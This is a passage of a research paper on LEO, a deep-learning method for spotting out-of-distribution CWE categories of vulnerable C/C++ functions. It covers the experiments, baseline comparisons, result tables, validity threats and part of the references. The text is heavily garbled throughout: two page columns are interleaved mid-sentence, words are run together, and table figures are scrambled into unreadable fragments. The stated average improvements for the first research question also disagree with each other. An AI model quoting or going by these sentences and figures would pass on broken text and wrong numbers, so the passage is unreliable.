(RQ2) How does our method perform in different cases 150-dimensional Embedding layer followed by a Dropout of the in-distribution data when it consists of more than layer (with a dropped fixed probability p = 0.2), a 1D one CWE source code data category? convolutional layer (with the filter size 150 and kernel size In practice, the in-distribution D may encompass source in 3), and a 1D max pooling layer to encode each source code codedatafromoneormultipleCWEcategories.Therefore,in statementinasourcecodefunctionX.Notethatweutilizethe this research question, we investigate the performance of our commonly used values for these hyperparameters. Finally, a LEO method in various cases regarding different numbers of mini-batchoffunctionsinwhicheachfunctionconsistingofL CWE categories (i.e., without loss of generality, we assume encodedstatementswasfedtothedeeplearning-basedmodels. there are two and three different CWE categories) presenting It is worth noting that the Embedding and 1D convolutional in the in-distribution source code data D and observe how in layers are learnable during the training process. the model performs compared to the baselines. Itisworthnotingthatfromtheuseddatasets,thelength(L) (RQ3)Dotheinnovativecluster-contrastivelearningand of each function is padded or truncated to 100 source code underlying-data-distributionmechanism helpimprovethe statements (i.e., we base on the quantile values of the source code data representation learning for boosting the model code data’ length to decide the length of each source code performance in OOD source code data identification? data sample). Specifically, more than 95% of the functions We investigate the effectiveness of the cluster-contrastive consist of 100 or fewer source code statements. Furthermore, learning(consideringsourcecodecharacteristicsandsemantic we observe that almost all important information relevant to relationships inside and between code data) and underlying- the vulnerability of each source code data sample (e.g., a data-distribution mechanism (ensuring the selection of signif- function) lies in the first 100 source code statements. icant source code statements) in enhancing the entire source 3) Baselinemethods: Themainbaselinesofourproposed code data representation learning process, helping boost the LEO method are some effective and state-of-the-art methods model’s ability for OOD source code data identification. forout-of-distributiondetectionincludingStandardDNN[45], 1) Studied datasets: We conducted experiments on many Outlier Exposure [24], and SSD [27]. These methods were different real-world (CWE) types extracted from an up-to- originally applied to computer vision data applications. To date and big C/C++ dataset, namely DiverseVul provided make these methods able to be applied to the source code 8data, we keep the principles and make some modifications functionasnonlinearityandDropout[77]witharetainedfixed on the network for data representation learning as used in probability p = 0.8 as regularization. The last dense layer our method. There are other methods, e.g., [30], [44], [73], of the g(·;α) network for learning a discrete distribution is recentlyintroducedforout-of-distributiondetection.However, followed by a sigmoid function while the last dense layer of thesemethodswereoperatedbasedonthenatureofthevision the f(·;β) network is followed by a softmax function for data, so they are not applicable to the source code data. predicting. The number of chosen clusters guiding the com- The additional baselines of our LEO method are some putation of the innovative cluster-contrastive learning men- state-of-the-art SVD methods including VulDeePecker [8], tioned is set in {1,3,5,7,9}. The trade-off hyper-parameter CodeBERT [55], and ReGVD [15]. We investigate how these λ representing the weight of the innovative cluster-contrastive effective SVD methods perform for identifying OOD source learning is in {10−2,10−1,100} while the scalar temperature code data. The rationale is that an effective model should τ is in {0.5,1.0}. The temperature ν for the Gumbel softmax produce high-quality data representations that also facilitate distribution is also set in {0.5,1.0}. Note that we utilize the distinguishing the data between in-distribution and OOD. commonly used values for these hyperparameters. ForourLEOmethodandbaselines,weemployedtheAdam We briefly summarize the baselines as follows: optimizer [70] with an initial learning rate equal to 10−3, • Standard DNN [45]. It is a baseline utilizing probabili- while the mini-batch size is set to 128. For the training tiesfromsoftmaxdistributionsfordetectingmisclassified process, we split the data of each in-distribution data into and out-of-distribution examples in neural networks. two random partitions. The first partition contains 80% for • OutlierExposure[24].ItenablesOOD(anomaly)detec- training, the second partition contains 20% for validation. torstogeneralizeanddetectunseenanomaliesbytraining For each in-distribution data, we used 10 epochs for the anomaly detectors against an auxiliary dataset of outliers training process. We additionally applied gradient clipping disjoint from the testing dataset (i.e., OOD data). regularization to prevent over-fitting. For each method, we • SSD [27]. An outlier detector method utilizes con- ran the corresponding model several times and reported the trastive representation learning followed by a Maha- averaged FPR (at TPR 95%), AUROC, and AUPR measures. lanobis distance-based detection in the feature space for We ran our experiments in Python using Tensorflow [78] outlier (out-of-distribution) detection. for the used methods on a 13th Gen Intel(R) Core(TM) i9- • VulDeePecker [8]. It is one of the most effective deep 13900KF having 24 CPU Cores at 3.00 GHz with 32GB learning-based software vulnerability detection methods RAM, integrated Gigabyte RTX 4090 Gaming OC 24GB.
leveraging the power of bi-directional long-short-term Some baseline methods (i.e., CodeBERT [55] and ReGVD memory (LSTM) networks [74]. [15]) were written using Pytorch [79]. For these baselines, we followed the source code samples published by the authors. • CodeBERT [55]. A pre-trained model (based on the Transformer’sencoderframework[56])specializesinthe 5) Measures: To measure the performance of our programminglanguage.ViaCodeBERT,weaimtoinves- LEO method and baselines, we use three main metrics, i.e., tigate how large language models work in the context of FPR (at TPR 95%), AUROC, and AUPR, commonly used out-of-distribution source code data identification. in out-of-distribution (OOD) detection methods, as noted in [24], [27], [29]. In particular, the FPR (at TPR 95%) metric • ReGVD [15]. It is an effective Graph neural network- calculates how many percent of OOD data are predicted based model (i.e., using Graph convolutional networks as in-distribution data. For the FPR measure, the smaller [75] and Gated graph neural networks [76]) for the value is better. The AUROC (the area under the receiver software vulnerability detection problem. operating characteristic) metric presents the model’s ability 4) Model’s configurations: For the main baselines of our to discriminate between the in-distribution and OOD data LEO methodincludingStandardDNN[45],OutlierExposure while the AUPR (the area under the precision-recall curve) [24], and SSD [27]. These methods are popular and state-of- metric measures if the model can find all OOD data without the-art approaches for out-of-distribution detection applied in accidentallymarkinganyin-distributiondataasOODdata.For thecomputervisiondomain.Tomakethemapplicableforout- the AUROC and AUPR measures, the higher value is better. of-distributionsourcecodevulnerabilitydetection,wekeepthe principle of these methods and use the same data embedding B. Experimental results process for handling the sequential source code data as used inourmethod.Fortheadditionalbaselineapproaches,popular RQ1:CanourmethodsuccessfullyidentifyOODsource and state-of-the-art SVD methods (i.e., VulDeePecker [8], code data? How effective is it compared to baselines? CodeBERT [55], and ReGVD [15]), we use the architecture a) Approach: We compare the performance of our proposed in the corresponding papers. LEO method with the baselines including Standard DNN To our LEO method, for the g(·;α) and f(·;β) networks, [45], Outlier Exposure [24], SSD [27], VulDeePecker [8], we used deep feed-forward neural networks having three and CodeBERT [55], and ReGVD [15] in the task of out-of- two hidden layers with the size of each hidden layer in distributionsourcecodedataidentificationusingFPR(atTPR {100,300}. The dense hidden layers are followed by a ReLU 95%), AUROC, and AUPR measures. 9AsmentionedinSectionV-A1,weconductourexperiments TABLE I: The results of our LEO method and baselines on the top most dangerous and popular software common for the FPR (at TPR 95%), AUROC, and AUPR measures weakness enumeration (CWE). In the training phase, we on the vulnerable source code of each OOD CWE category alternativelyusesourcecodedatafromeachCWEcategoryas corresponding with specific in-distribution (ID) data. (The in-distributiondatatotrainourLEOmethodandthebaselines. best results are in bold while the second highest results are In the inference (testing) phase, for each trained model on a in underline. The numbers highlighted in blue represent the specificin-distributionCWEsourcecodecategory,weusethe improvements of our method over the second-best baseline.) remainingsourcecodedatafromotherCWEcategoriesasout- IDandOOD Methods FPR↓ AUROC↑ AUPR↑ of-distribution data to evaluate the model’s performance. For StandardDNN 86.30% 67.93% 84.60% example, we train each model using source code data from OutlierExposure 79.30% 68.93% 86.13% SSD 84.78% 66.71% 84.67% the CWE-269 category as in-distribution data. In the testing CWE287vs.CWE416 VulDeePecker 77.63% 68.20% 85.61% CodeBERT 88.57% 68.25% 85.49% phase, we use source code data from other CWE categories ReGVD 90.40% 58.58% 81.88% (e.g., CWE-20 and CWE-200) as out-of-distribution data to LEO(Ours) 69.71% 76.75% 90.57% (↓7.92%) (↑7.82%) (↑4.44%) evaluatethemodelperformance.Wethendothesameprocess StandardDNN 79.36% 69.28% 78.75% OutlierExposure 80.30% 70.05% 78.49% for source code data from other CWE categories. SSD 79.92% 72.70% 78.86% CWE269vs.CWE200 VulDeePecker 83.90% 74.73% 81.62% It is worth noting that following the setting of the out-of- CodeBERT 88.43% 65.64% 74.55% distributionidentificationproblem,wedonotuseanyinforma- ReGVD 93.74% 61.01% 69.55% 76.89% 79.33% 85.32% tionfromout-of-distributionCWEsourcecodedatacategories LEO(Ours) (↓2.47%) (↑4.60%) (↑3.70%) in the training phase. We only use out-of-distribution CWE StandardDNN 50.00% 80.28% 78.26% OutlierExposure 71.21% 79.29% 76.57% categories in the inference (testing) process for evaluating SSD 46.97% 82.55% 83.78% CWE863vs.CWE287 VulDeePecker 48.48% 79.20% 76.53% the models’ performance. In practice, vulnerable data falling CodeBERT 53.85% 78.54% 78.43% ReGVD 66.15% 80.42% 77.84% under out-of-distribution CWE categories pose a significantly 33.33% 87.06% 85.99% LEO(Ours) higher risk to security systems compared to non-vulnerable (↓13.64%) (↑4.51%) (↑2.21%) StandardDNN 73.26% 75.60% 95.60%
data. Therefore, in our experiments, we primarily investigate OutlierExposure 74.44% 75.83% 95.28% the performance of our LEO method and the baselines on SSD 85.70% 70.40% 94.17% CWE94vs.CWE20 VulDeePecker 77.85% 73.79% 95.54% vulnerable data belonging to OOD CWE categories. CodeBERT 87.55% 74.93% 94.58% ReGVD 94.74% 66.98% 92.55% b) Quantitative results: The experimental results in Ta- LEO(Ours) 51.70% 84.37% 97.72% (↓21.56%) (↑8.54%) (↑2.12%) ble1demonstratethesuperiorityofour LEO methodoverthe StandardDNN 85.54% 69.97% 60.47% OutlierExposure 82.69% 69.93% 60.22% baseline approaches. In particular, our method obtains much SSD 77.87% 74.46% 66.04% higher performances in all of the used measures including CWE190vs.CWE119 VulDeePecker 85.17% 70.01% 59.79% CodeBERT 90.72% 68.74% 55.74% FPR, AUROC, and AUPR with a high margin for almost ReGVD 96.66% 50.50% 41.33% 68.85% 77.59% 72.42% all cases of the in-distribution and out-of-distribution CWE LEO(Ours) (↓9.02%) (↑3.13%) (↑6.38%) sourcecodedata.Ingeneral,onaverage,ourmethodachieves StandardDNN 72.96% 71.90% 91.43% OutlierExposure 77.33% 73.29% 91.62% significantly higher performances than the baselines from SSD 85.33% 69.69% 89.44% CWE269vs.CWE20 VulDeePecker 79.63% 71.23% 90.33% around 14.20%, 6.67%, and 5.12% on the FPR, AUROC, and CodeBERT 91.40% 67.44% 87.62% AUPR measures, respectively, across the used in-distribution ReGVD 92.51% 62.60% 86.31% 64.30% 79.51% 93.95% and out-of-distribution CWE source code data categories. LEO(Ours) (↓8.66%) (↑6.22%) (↑2.33%) c) Qualitative results: To further demonstrate the ad- vancement and effectiveness of our LEO method for OOD representations provide compelling evidence of the robustness source code data identification compared to the baselines, we of our LEO method in boosting the learning of source code visualize the representations of both in-distribution and out- data representations, thus facilitating the identification of out- of-distribution source code data in the feature space. The of-distribution CWE source code data. visualizations help us investigate whether our LEO method can successfully learn the characteristics and leverage the InconclusionforRQ1:ThequantitativeresultsinTable semantic relationships inside and between source code data I on three main measures (i.e., FPR (at TPR 95%), to effectively distinguish between in-distribution and out-of- AUROC, and AUPR) and the qualitative visualizations distribution source code data samples, facilitating addressing depicted in Figure 4 show the effectiveness and ad- the OOD source code data identification problem. vancementofourLEOmethodinachievingsignificantly We use a t-SNE [80] projection, with perplexity equal to higher performances for identifying OOD CWE source 300, to visualize the distributions of the in-distribution and code data categories over the baselines. In short, our out-of-distribution data in the feature space. As illustrated method achieves higher performances than the baselines in Figure 4, it becomes apparent that our LEO method from around 13.77%, 7.88%, and 4.84% on average to significantly enhances the separation of the distributions be- theFPR,AUROC,andAUPRmeasures,respectively,on tween in-distribution and out-of-distribution source code data the used in-distribution and OOD CWE categories. in the latent space, compared to the baselines. These visual 10Standard DNN Outlier Exposure SSD LEO VulDeepecker ReGVD CodeBert Fig. 4: A 2D t-SNE projection for the data representation distribution of the in-distribution data (blue color) and the out-of- distributionvulnerabledata(redcolor)inthelatentspace(i.e.,wheresourcecodedatafromCWE863andCWE287categories are used as in-distribution data and out-of-distribution data, respectively) of our proposed LEO method and the baselines. Fig. 5: The average results for the FPR (at TPR 95%), AUROC, and AUPR measures, respectively, of our LEO method and baselines in all cases of the in-distribution and out-of-distribution CWE categories mentioned in Tables I and II. Note that for the FPR measure, the smaller value is better while for the AUROC, and AUPR measures, the higher value is better. We denote the Standard DNN, Outlier Exposure, VulDeePecker, and CodeBERT methods as SDNN, OE, VDP, and CBERT for short. RQ2: How does our method perform in different cases e) Results: The results in Table II once again demon- of the in-distribution data when it consists of more than strate the effectiveness and superiority of our LEO method one CWE source code data category? compared to the baselines for OOD source code data iden- d) Approach: This research question reflects different tification in all various cases of the in-distribution data. reality cases where the in-distribution source code data are Specifically, in these cases when there is more than one CWE from more than one (as presented in Table I) CWE category. categoryexistinginthein-distributiondata(e.g.,twoandthree Therefore,wefurtherinvestigateourproposed LEO method’s differentCWEsourcecodedatacategories),our LEO method performance in cases of different CWE categories existing in still consistently obtains much higher performances on all thein-distributionsourcecodedataandobservehowthemodel pairs of the in-distribution and out-of-distribution source code performs compared to the baselines. data on the used measures. In these cases, on average, our For this experiment, without loss of generality, we assume LEO methodgainshigherperformancesfromaround14.22%, the presence of two and three different CWE categories 6.45%, and 5.08% than the baselines on the FPR (at TPR within the in-distribution data, as shown in Table II. We 95%), AUROC, and AUPR measures, respectively.
randomly choose source code data from different CWE types In Figure 5, wepresent the average values ofthe FPR, AU- to create the combinations to form the in-distribution data. ROC,andAUPRmeasures,respectively,forour LEO method Subsequently, for each case of the in-distribution data, after and baselines in all cases of the ID and OOD CWE cate- the training process, in the inference (testing) phase, we use gories mentioned in Tables I and II. These average results source code data from other CWE categories as OOD data to highlight the advancement of our LEO method compared to evaluate the model’s performance. thebaselines.Inshort,onaverage,our LEO methodobtainsa 11TABLE II: The results of our LEO method and baselines out-of-distribution(OOD)CWEsourcecodedatacategoriesas for the FPR (at TPR 95%), AUROC, and AUPR measures shown in Table III. Note that in the case without using the on the vulnerable source code of each OOD CWE category cluster-contrastive learning and underlying-data-distribution corresponding with specific in-distribution (ID) data. (The mechanism, we denote the method as LEO-w/oCD. best results are in bold while the second highest results are in underline. The numbers highlighted in blue represent the TABLE III: The results of our LEO method for the FPR (at improvements of our method over the second-best baseline.) TPR 95%), AUROC, and AUPR measures on the vulnerable source code of each OOD CWE category corresponding with IDandOOD Methods FPR↓ AUROC↑ AUPR↑ StandardDNN 54.55% 80.00% 64.71% specific ID data when using and without using the cluster- OutlierExposure 57.58% 80.68% 65.78% contrastivelearningandtheunderlying-data-distributionmech- CWE863+862 SSD 48.48% 89.22% 71.28% vs.CWE287 VulDeePecker 60.61% 82.48% 56.61% anism. (The higher results in each pair of the ID and OOD CodeBERT 63.08% 89.60% 64.08% ReGVD 83.33% 67.89% 39.98% data are in bold. The numbers highlighted in the blue color LEO(Ours) 37.88% 90.48% 78.69% are the improvements of LEO over LEO-w/oCD.) (↓10.60%) (↑0.88%) (↑7.41%) StandardDNN 81.48% 73.10% 86.88% IDandOOD Methods FPR↓ AUROC↑ AUPR↑ OutlierExposure 75.41% 75.52% 88.55% LEO-woCD 83.14% 69.29% 78.13% CWE269+94 SSD 71.70% 75.99% 89.33% CWE269vs.CWE200 76.89% 79.33% 85.32% vs.CWE20 VulDeePecker 79.26% 73.30% 86.93% LEO (↓6.25%) (↑10.04%) (↑7.19%) CodeBERT 85.47% 69.37% 84.56% LEO-w/oCD 78.07% 73.54% 95.43% ReGVD 90.40% 62.13% 74.91% CWE94vs.CWE20 51.70% 84.37% 97.72% 63.26% 82.44% 91.74% LEO LEO(Ours) (↓26.37%) (↑10.83%) (↑2.29%) (↓8.44%) (↑6.45%) (↑2.41%) LEO-w/oCD 81.13% 62.99% 84.96% StandardDNN 80.44% 73.22% 91.77% CWE287vs.CWE416 69.71% 76.75% 90.57% OutlierExposure 80.07% 72.59% 91.56% LEO (↓11.42%) (↑13.76%) (↑5.61%) CWE863+287 SSD 70.30% 80.70% 94.27% LEO-w/oCD 77.33% 74.23% 92.27% vs.CWE20 VulDeePecker 78.37% 75.01% 92.39% CWE863+287 47.85% 88.76% 97.16% CodeBERT 85.92% 74.23% 91.37% vs.CWE20 LEO (↓29.48%) (↑14.53%) (↑4.89%) ReGVD 89.40% 62.29% 83.87% LEO-w/oCD 50.00% 79.15% 62.60% LEO(Ours) (↓24 27 .. 48 55 %% ) (↑8 88 .. 07 66 %% ) (↑9 27 .. 81 96 %% ) C vW s.E C8 W63 E+ 28 86 72 LEO (↓13 27 .. 18 28 %% ) (↑19 10 .. 34 38 %% ) (↑17 68 .. 06 99 %% ) StandardDNN 84.02% 67.47% 70.30% LEO-w/oCD 82.04% 64.39% 69.96% OutlierExposure 87.82% 66.34% 69.24% CWE287+862+94 55.71% 84.98% 86.59% CWE287+862+94 SSD 71.08% 74.95% 78.97% vs.CWE416 LEO (↓26.33%) (↑20.59%) (↑16.63%) vs.CWE416 VulDeePecker 78.39% 67.86% 72.03% CodeBERT 91.62% 68.64% 67.69% ReGVD 94.22% 55.55% 58.82% g) Results: The experimental results in Table III 55.71% 84.98% 86.59% LEO(Ours) (↓15.37%) (↑10.03%) (↑7.62%) show the effectiveness of cluster-contrastive learning and the underlying-data-distribution mechanism in improving the significantlyhigherperformancefromaround15.27%,7.39%, source code data representation learning process to boost the and 4.93% on the FPR, AUROC, and AUPR measures, re- model performance for OOD source code data identification. spectively, in comparison with the baselines. In particular, our method with the cluster-contrastive learn- ing and underlying-data-distribution mechanism terms (LEO) In conclusion for RQ2: The experimental results in obtained considerably higher performances than itself without Table II again show the superiority of our proposed using these terms (denoted as LEO-w/oCD) in all cases of LEO method over the baselines for OOD source code the in-distribution and out-of-distribution CWE categories. dataidentificationondifferentcasesregardingthevarious number of CWE categories existing in the in-distribution data. In concurrence with the results shown in Table I, ourmethoddemonstratesitsnoticeableadvancementwith much higher performances compared to the baselines on theusedmeasuresinalmostallcasesoftheIDandOOD CWE source code data categories. RQ3: Do the innovative cluster-contrastive learning and underlying-data-distributionmechanism helpimprovethe code data representation learning for boosting the model performance in OOD source code data identification? f) Approach: We compare the performance of our
LEO method to itself in the cases of using and without Fig. 6: The average results for the FPR (at TPR 95%), AU- using cluster-contrastive learning mentioned in Eq. (6) and ROC, and AUPR measures, respectively, of LEO-w/oCD and the underlying-data-distribution mechanism described in Eq. LEO in all cases of the in-distribution and out-of-distribution (5) to investigate if these additional terms successfully boost- CWE source code data categories mentioned in Table III. ing the code data representation learning facilitating out-of- distribution source code data identification. TheaverageexperimentalresultsfortheFPR,AUROC,and Weexperimentonsomepairsofthein-distribution(ID)and AUPRmeasuresoftheLEOandLEO-w/oCDmethodsacross 12all cases of the in-distribution (ID) and out-of-distribution 3) External validity: Key external validity threats include (OOD) CWE source code data categories, as mentioned in whether our LEO method will generalize across multiple Tables III, are shown at Figure 6. Particularly, on average, CWE source code categories. We mitigated this problem by LEO achieves much higher performances around 18.66%, conducting the experiments on an up-to-date and big C/C++ 13.51%, and 8.78% on the FPR, AUROC, and AUPR mea- dataset,namelyDiverseVul,[71].TheDiverseVuldatasetcon- sures, respectively, compared to LEO-w/oCD. These results tains 18,945 vulnerable functions and 330,492 non-vulnerable underscore the substantial advancement of LEO over LEO- functions covering 150 CWEs. In our paper, we conduct w/oCDinalltheusedIDandOODcases,asmeasuredbythe the experiments on the top most dangerous and popular FPR, AUROC, and AUPR metrics. CWE categories including CWE-119 (Improper Restriction of Operations within the Bounds of a Memory Buffer), In conclusion for RQ3: The results mentioned in CWE-20 (Improper Input Validation), CWE-125 (Out-of- Table III on the FPR (at TPR 95%), AUROC, and bounds Read), CWE-200 (Exposure of Sensitive Information AUPR measures show the benefits of using cluster- to an Unauthorized Actor), CWE-787 (Out-of-bounds Write), contrastivelearningandtheunderlying-data-distribution CWE-416 (Use After Free), CWE-269 (Improper Privilege mechanismforboostingsourcecodedatarepresentation Management), CWE-94 (Improper Control of Generation of learning. These terms help significantly improve the Code), CWE-190 (Integer Overflow or Wraparound), CWE- model performance for OOD source code data identi- 264(Permissions,Privileges,andAccessControls),CWE-863 fication in all cases of the in-distribution and out-of- (Incorrect Authorization), CWE-862 (Missing Authorization), distribution CWE source code data categories. and CWE-287 (Improper Authentication). C. Threats to validity VI. CONCLUSION 1) Construct validity: Key construct validity threats are In this paper, we have successfully proposed an innovative if the assessments of our proposed LEO method and base- deep learning-based approach, a pioneering study, for out- linesdemonstratetheircapabilityforout-of-distributionsource of-distribution (OOD) source code data identification. Our code data identification. In the cyber security domain, the proposed LEO method derived from the information the- out-of-distribution source code data identification task helps ory, combined with the use of innovative cluster-contrastive determine if an input is from an in-distribution (ID) or out- learning and the underlying-data-distribution mechanism, has of-distribution (OOD). That enables the model and security effectively learned the source code characteristics and figured experts to take appropriate precautions and actions. In partic- out the semantic relationships inside and between source ular,thisstageassistssecurityanalystsandsoftwareengineers code data samples to boost the data representation learning in identifying potential out-of-distribution CWE source code facilitatingOODsourcecodedataidentification.Theextensive data outside the established in-distribution CWE source code experimental results on the top most dangerous and popular data categories before feeding input data into subsequent CWE source code data categories demonstrate the effective- machine learning and deep learning modules, to harden the ness and advancement of our LEO method compared to the software security systems. To evaluate the performance of state-of-the-art baselines by a wide margin. our LEO method and baselines, we use three main measures widely used in out-of-distribution detection including FPR (at REFERENCES TPR 95%), AUROC, and AUPR. [1] M.Dowd,J.McDonald,andJ.Schuh,TheArtofSoftwareSecurityAs- 2) Internal validity: Key internal validity threats are rele- sessment:IdentifyingandPreventingSoftwareVulnerabilities. Addison- WesleyProfessional,2006. vant to the choice of hyper-parameter settings (i.e., optimizer, [2] S. Neuhaus, T. Zimmermann, C. Holler, and A. Zeller, “Predicting learning rate, number of layers in deep neural networks, etc.). vulnerable software components,” The ACM Conference on Computer Itisworthnotingthatfindingasetofoptimalhyperparameter andCommunicationsSecurity,2007. [3] Y. Shin, A. Meneely, L. Williams, and J. A. Osborne, “Evaluating settings of deep neural networks is expensive due to a large complexity,codechurn,anddeveloperactivitymetricsasindicatorsof number of trainable parameters. To train our method, we only software vulnerabilities,” IEEE Transactions on Software Engineering, usethecommonordefaultvaluesforthehyperparameters.For vol.37,no.6,pp.772–787,2011. [4] F.Yamaguchi,F.Lindner,andK.Rieck,“Vulnerabilityextrapolation:as- example, we use the Adam optimizer; the learning rate equals sisteddiscoveryofvulnerabilitiesusingmachinelearning,”TheUSENIX
10−3; the size of neural layers is set in {100,300} while the conferenceonOffensiveTechnologies,pp.13–23,2011. scalar temperature τ used in the cluster-contrastive learning [5] G.Grieco,G.L.Grinblat,L.Uzal,S.Rawat,J.Feist,andL.Mounier, and the temperature ν for the Gumbel softmax distribution is “Toward large-scale vulnerability discovery using machine learning,” The ACM Conference on Data and Application Security and Privacy, set in {0.5,1.0}. For the number of clusters used in cluster- pp.85–96,2016. contrastive learning aiming to improve the data representation [6] Z.Li,D.Zou,S.Xu,H.Jin,H.Qi,andJ.Hu,“Vulpecker:Anautomated learning process, we use it as a hyperparameter. In our paper, vulnerability detection system based on code similarity analysis,” The Annual Conference on Computer Security Applications, pp. 201–213, we detail the hyperparameter settings (i.e., the value-tuned 2016. ranges of the hyperparameters) in the released reproducible [7] S. Kim, S. Woo, H. Lee, and H. Oh, “VUDDY: A scalable approach source code to support future replication studies. forvulnerablecodeclonediscovery,”TheIEEESymposiumonSecurity andPrivacy,pp.595–614,2017. 13[8] Z.Li,D.Zou,S.Xu,X.Ou,H.Jin,S.Wang,Z.Deng,andY.Zhong, [30] J. Winkens, R. Bunel, A. G. Roy, R. Stanforth, V. Natarajan, J. R. “Vuldeepecker: A deep learning-based system for vulnerability detec- Ledsam,P.MacWilliams,P.Kohli,A.Karthikesalingam,S.Kohl,A.T. tion,”CoRR,vol.abs/1801.01681,2018. Cemgil, S. M. A. Eslami, and O. Ronneberger, “Contrastive training [9] X.Duan,J.Wu,S.Ji,Z.Rui,T.Luo,M.Yang,andY.Wu,“Vulsniper: forimprovedout-of-distributiondetection,”CoRR,vol.abs/2007.05566, Focusyourattentiontoshootfine-grainedvulnerabilities,”TheInterna- 2020. tionalJointConferenceonArtificialIntelligence,IJCAI,pp.4665–4671, [31] P. C. Mahalanobis, “On the generalized distance in statistics,” The 2019. NationalInstituteofScienceofIndia,1936. [10] X.Cheng,H.Wang,J.Hua,M.Zhang,G.Xu,L.Yi,andY.Sui,“Static [32] Y. Zheng, S. Pujar, B. L. Lewis, L. Buratti, E. A. Epstein, B. Yang, detectionofcontrol-flow-relatedvulnerabilitiesusinggraphembedding,” J. Laredo, A. Morari, and Z. Su, “D2a: A dataset built for ai-based The International Conference on Engineering of Complex Computer vulnerability detection methods using differential analysis,” The Inter- Systems(ICECCS),2019. nationalConferenceonSoftwareEngineering:SoftwareEngineeringin [11] V. Nguyen, T. Le, T. Le, K. Nguyen, O. DeVel, P. Montague, L. Qu, Practice(ICSE-SEIP),2021. and D. Phung, “Deep domain adaptation for vulnerable code function [33] T. Le, V. Nguyen, T. Pham, M. Dinh, and T. H. Le, “Fuzzy semi- identification,”TheInternationalJointConferenceonNeuralNetworks supervisedlargemarginone-classsupportvectormachine,”TheNational (IJCNN),2019. Foundation for Science and Technology Development (NAFOSTED) [12] Y.Zhuang,Z.Liu,P.Qian,Q.Liu,X.Wang,andQ.He,“Smartcontract ConferenceonInformationandComputerScience,2014. vulnerability detection using graph neural network,” The International [34] V. Nguyen, T. Le, T. Pham, M. Dinh, and T. H. Le, “Kernel-based JointConferenceonArtificialIntelligence,IJCAI,pp.3283–3290,2020. semi-supervised learning for novelty detection,” International Joint [13] V. Nguyen, T. Le, O. De Vel, P. Montague, J. Grundy, and D. Phung, ConferenceonNeuralNetworks(IJCNN),2014. “Dual-component deep domain adaptation: A new approach for cross [35] P.Duong,V.Nguyen,M.Dinh,T.Le,D.Tran,andW.Ma,“Graph-based project software vulnerability detection,” The Pacific-Asia Conference semi-supervised support vector data description for novelty detection,” onKnowledgeDiscoveryandDataMining,2020. InternationalJointConferenceonNeuralNetworks(IJCNN),2015. [14] V. Nguyen, T. Le, O. de Vel, P. Montague, J. Grundy, and D. Phung, [36] A.V.D.Oord,N.Kalchbrenner,andK.Kavukcuoglu,“Pixelrecurrent “Information-theoreticsourcecodevulnerabilityhighlighting,”inInter- neuralnetworks,”CoRR,vol.abs/1601.06759,2016. nationalJointConferenceonNeuralNetworks(IJCNN),2021. [37] T. Salimans, A. Karpathy, X. Chen, and D. P. Kingma, “Pixelcnn++: [15] V. Nguyen, D. Q. Nguyen, V. Nguyen, T. Le, Q. H. Tran, and D. Q. Improvingthepixelcnnwithdiscretizedlogisticmixturelikelihoodand Phung, “Regvd: Revisiting graph neural networks for vulnerability othermodifications,”CoRR,vol.abs/1701.05517,2017. detection,” The International Conference on Software Engineering: [38] S. Liang, Y. Li, and R. Srikant, “Enhancing the reliability of CompanionProceedings(ICSE-Companion),2022. out-of-distribution image detection in neural networks,” CoRR, vol. [16] M.Fu,V.Nguyen,C.K.Tantithamthavorn,T.Le,andD.Phung,“Vulex- abs/1706.02690,2017. plainer: A transformer-based hierarchical distillation for explaining [39] C. Guo, G. Pleiss, Y. Sun, and K. Q. Weinberger, “On calibration of
vulnerability types,” The IEEE Transactions on Software Engineering, modernneuralnetworks,”CoRR,vol.abs/1706.04599,2017. vol.49,no.10,2023. [40] B.Lakshminarayanan,A.Pritzel,andC.Blundell,“Simpleandscalable [17] M.Fu,C.K.Tantithamthavorn,T.Le,Y.Kume,V.Nguyen,D.Phung, predictive uncertainty estimation using deep ensembles,” CoRR, vol. andJ.Grundy,“Aibughunter:Apracticaltoolforpredicting,classifying abs/1612.01474,2016. and repairing software vulnerabilities,” The Empirical Software Engi- [41] E. Nalisnick, A. Matsukawa, Y. W. Teh, D. Gorur, and B. Lakshmi- neering,vol.49,2023. narayanan,“Dodeepgenerativemodelsknowwhattheydonotknow?” [18] I. J. Goodfellow, J. Shlens, and C. Szegedy, “Explaining and harness- CoRR,vol.abs/1810.09136,2018. ing adversarial examples,” The International Conference on Learning [42] H. Choi, E. Jang, and A. A. Alemi, “Waic, but why? generative Representations(ICLR),2015. ensembles for robust anomaly detection,” CoRR, vol. abs/1810.01392, [19] D. Amodei, C. Olah, J. Steinhardt, P. F. Christiano, J. Schulman, and 2018. D.Mane´,“ConcreteproblemsinAIsafety,”CoRR,vol.abs/1606.06565, 2016. [43] D.P.KingmaandP.Dhariwal,“Glow:Generativeflowwithinvertible 1x1convolutions,”CoRR,vol.abs/1807.03039,2018. [20] X.Zhou,T.Zhang,andD.Lo,“Largelanguagemodelforvulnerability detection: Emerging results and future directions,” The New Ideas and [44] D. Hendrycks, M. Mazeika, S. Kadavath, and D. Song, “Using self- EmergingResultsTrackatICSE,2024. supervised learning can improve model robustness and uncertainty,” CoRR,vol.abs/1906.12340,2019. [21] A. M. Nguyen, J. Yosinski, and J. Clune, “Deep neural networks are easilyfooled:Highconfidencepredictionsforunrecognizableimages,” [45] D. Hendrycks and K. Gimpel, “A baseline for detecting misclassified CoRR,vol.abs/1412.1897,2014. andout-of-distributionexamplesinneuralnetworks,”TheInternational [22] MITRE. Common weakness enumeration (cwe™). ConferenceonLearningRepresentations(ICLR),2017. https://cwe.mitre.org/. [46] G.Lin,J.Zhang,W.Luo,L.Pan,Y.Xiang,O.D.Vel,andP.Montague, [23] D. Hendrycks and K. Gimpel, “A baseline for detecting misclassi- “Cross-project transfer representation learning for vulnerable function fied and out-of-distribution examples in neural networks,” CoRR, vol. discovery,”inIEEETransactionsonIndustrialInformatics,2018. abs/1610.02136,2016. [47] H.K.Dam,T.Tran,T.Pham,S.W.Ng,J.Grundy,andA.Ghose,“Au- [24] D.Hendrycks,M.Mazeika,andT.G.Dietterich,“Deepanomalydetec- tomaticfeaturelearningforpredictingvulnerablesoftwarecomponents,” tion with outlier exposure,” The International Conference on Learning TheIEEETransactionsonSoftwareEngineering,2018. Representations(ICLR),2019. [48] Z.Li,D.Zou,S.Xu,H.Jin,Y.Zhu,Z.Chen,S.Wang,andJ.Wang, [25] K. Lee, H. Lee, K. Lee, and J. Shin, “Training confidence-calibrated “Sysevr: A framework for using deep learning to detect software classifiers for detecting out-of-distribution samples,” The International vulnerabilities,”CoRR,vol.abs/1807.06756,2018. ConferenceonLearningRepresentations(ICLR),2018. [49] V. Nguyen, T. 